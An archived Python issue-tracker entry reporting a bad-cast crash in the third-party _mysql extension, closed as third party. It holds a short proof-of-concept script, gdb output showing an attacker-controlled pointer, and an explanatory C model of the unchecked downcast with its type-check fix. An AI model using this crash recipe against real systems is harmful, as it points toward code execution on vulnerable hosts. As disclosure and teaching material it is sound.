This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in Python's Developer Guide.

classification
Title: Bad cast @ _mysql_ResultObject_Initialize() results in code execution
Type: crash
Stage: resolved
Components: Library (Lib)
Versions: Python 2.7
process
Status: closed
Resolution: third party
Dependencies:
Superseder:
Assigned To:
Nosy List: christian.heimes, zeroinside
Priority: normal
Keywords:

Created on 2017-01-04 11:26 by zeroinside, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Messages (2)
msg284629 - (view) Author: zeroinside (zeroinside) Date: 2017-01-04 11:26
Hello.
I found a vulnerability in the _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666          # second argument; shows up in rdx at the crash site below
payload="A"*2048        # a str passed where a connection object is expected
_mysql.result(payload,RDX)


It's an exploitable bug; I'm working on an exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)
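The title and the register dump above describe one pattern: a C extension function downcasts whatever object it is handed to its own connection struct without checking the type, so a 2048-byte str is read as if it were a connection, `mov 0x4d0(%rdi),%rax` loads the 'A' bytes as a pointer, and the next instruction faults dereferencing it. The block below is an added example, not MySQLdb's or CPython's code, that models that pattern in plain C without Python.h. All struct and type names are hypothetical; the only detail taken from the page is the 0x4d0 field offset. The unchecked reader returns the would-be pointer value instead of jumping through it, so the demo stays memory-safe, and the checked reader shows the fix a practitioner would apply.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the CPython object header: every object begins with a
 * pointer to its type. Names here are illustrative, not CPython's or
 * MySQLdb's. */
typedef struct TypeDesc { const char *tp_name; } TypeDesc;
typedef struct ObjHeader { const TypeDesc *ob_type; } ObjHeader;

static const TypeDesc StrType  = { "str" };
static const TypeDesc ConnType = { "connection (modelled)" };

/* Stand-in for the client library's connection handle. The field the
 * crash site reads sits at +0x4d0, matching `mov 0x4d0(%rdi),%rax`
 * in the disassembly; everything before it is opaque padding here. */
typedef struct ConnHandle {
    unsigned char opaque[0x4d0];
    void *methods;     /* loaded at +0x4d0, then +0x18 is dereferenced and jumped to */
} ConnHandle;

typedef struct ConnObject {     /* the type the result constructor expects */
    ObjHeader  head;
    ConnHandle conn;
} ConnObject;

typedef struct StrObject {      /* what the PoC actually passes: "A"*2048 */
    ObjHeader head;
    size_t    len;
    char      data[2048];
} StrObject;

/* Reads conn.methods exactly as the unchecked path does, but returns the
 * value instead of dereferencing it. In the real code this value is used
 * as a pointer, which is the SIGSEGV inside mysql_use_result. */
static uintptr_t bad_cast_read(ObjHeader *arg)
{
    ConnObject *c = (ConnObject *)arg;         /* BAD: downcast with no type check */
    uintptr_t v;
    memcpy(&v, &c->conn.methods, sizeof v);    /* the same bytes a `mov` would load */
    return v;
}

/* Hardened: refuse anything whose ob_type is not the expected type.
 * In a real extension this is PyObject_TypeCheck() or the "O!" format
 * of PyArg_ParseTuple(), which raises TypeError for the caller. */
static int checked_read(ObjHeader *arg, uintptr_t *out)
{
    if (arg == NULL || arg->ob_type != &ConnType)
        return -1;                             /* TypeError instead of a wild jump */
    *out = (uintptr_t)((ConnObject *)arg)->conn.methods;
    return 0;
}

/* Constructed inputs (not captured from a real process). */
static StrObject  payload;                     /* "A"*2048, as in the PoC */
static ConnObject real_conn;
static int        methods_sentinel;            /* stands in for a real method table */

static ObjHeader *make_payload_str(void)
{
    payload.head.ob_type = &StrType;
    payload.len = sizeof payload.data;
    memset(payload.data, 'A', sizeof payload.data);
    return &payload.head;
}

static ObjHeader *make_real_connection(void)
{
    memset(&real_conn, 0, sizeof real_conn);
    real_conn.head.ob_type = &ConnType;
    real_conn.conn.methods = &methods_sentinel;
    return &real_conn.head;
}

/* 0x41 in every byte of a pointer: 0x4141414141414141 on x86-64, the rax
 * value in the register dump. */
static uintptr_t all_A_pattern(void)
{
    uintptr_t v = 0;
    memset(&v, 'A', sizeof v);
    return v;
}

int main(void)
{
    uintptr_t v = 0;
    printf("unchecked downcast of a str would jump via %#llx\n",
           (unsigned long long)bad_cast_read(make_payload_str()));
    printf("checked path on str:        rc=%d\n", checked_read(make_payload_str(), &v));
    printf("checked path on connection: rc=%d\n", checked_read(make_real_connection(), &v));
    return 0;
}
```

The str object is larger than the connection struct, so the field read at +0x4d0 lands inside the attacker-supplied 'A' bytes rather than outside the allocation; that is why the crash shows a clean 0x4141414141414141 in rax instead of a fault on the first load. The fix is one comparison on ob_type before the cast; in CPython terms, parse the argument with "O!" and the expected type object, or call PyObject_TypeCheck and return NULL with TypeError set when it fails.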
msg284630 - (view) Author: Christian Heimes (christian.heimes) * (Python committer) Date: 2017-01-04 11:30
mysql is a 3rd party extension and not part of the Python standard library. Please report the issue to MySQL.
History
Date                 User              Action  Args
2022-04-11 14:58:41  admin             set     github: 73336
2017-01-04 11:30:44  christian.heimes  set     status: open -> closed
                                               type: security -> crash
                                               nosy: + christian.heimes
                                               messages: + msg284630
                                               resolution: third party
                                               stage: resolved
2017-01-04 11:26:34  zeroinside        create